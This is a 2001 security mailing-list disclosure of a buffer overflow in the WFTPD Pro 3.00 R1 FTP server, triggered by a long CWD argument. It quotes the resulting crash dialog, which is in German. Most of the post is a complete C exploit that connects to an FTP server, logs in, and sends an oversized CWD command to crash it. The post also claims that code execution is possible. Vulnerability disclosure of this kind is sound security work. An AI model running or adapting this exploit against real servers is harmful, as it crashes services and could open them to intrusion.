Date: Sat, 3 Mar 2001 18:51:52 -0000
From: [email protected]
To: [email protected]Subject: WFTPD Pro 3.00 R1 Buffer Overflow
When sending a command (cwd) followed by a long
argument (~500 char '.')
the server crashes with:
Anwendungspopup: WFTPD Service Control:
WFTPD.EXE - Fehler in Anwendung:
Die Anweisung in "0x2e2e2e2e" verweist auf
Speicher
in "0x2e2e2e2e". Der Vorgang
"read" konnte nicht auf dem Speicher durchgefЭhrt
werden.
which means in English: Exception fault at:
0x2e2e2e2e
reading from 0x2e2e2e2e is not possible...
Executing arbitrary code is possible
The author has been contacted
----------------------
[email protected] or
[email protected]
Tested on win2k using trail version of WFTPD 3.00
R1
Simple exploit:
//WFTPD Pro 3.00 R1 Buffer Overflow exploit
//written by [email protected]
#include <stdio.h>
#include <winsock.h>
#include <windows.h>
#include <malloc.h>
void main(){
SOCKET sock_victim;
WORD version=MAKEWORD(1,1);
WSADATA wsadata;
SOCKADDR_IN victim;
int sockid;
char buffer[1024];
char exploitbuffer[800]={"CWD "};
char recvbuffer[1024];
WSAStartup(version, &wsadata);
sock_victim=socket(AF_INET,
SOCK_STREAM, IPPROTO_TCP);
victim.sin_family=AF_INET;
victim.sin_addr.s_addr=inet_addr
("10.17.3.44");
victim.sin_port=htons(21);
sockid=connect(sock_victim, (sockaddr*)
&victim, sizeof(victim));
recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
memset(recvbuffer, '/0',sizeof(recvbuffer));
send(sock_victim, "USER test\r\n",strlen
("USER test\r\n"),0);
recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
memset(recvbuffer, '/0',sizeof(recvbuffer));
send(sock_victim, "PASS\r\n",strlen
("PASS\r\n"),0);
recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
memset(recvbuffer, '/0',sizeof(recvbuffer));
memset(exploitbuffer+4,'.',sizeof
(exploitbuffer)-4);
sprintf(buffer,"%s\r\n",exploitbuffer);
send(sock_victim, buffer , sizeof(buffer),0);
recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
closesocket(sockid);
closesocket(sock_victim);
}
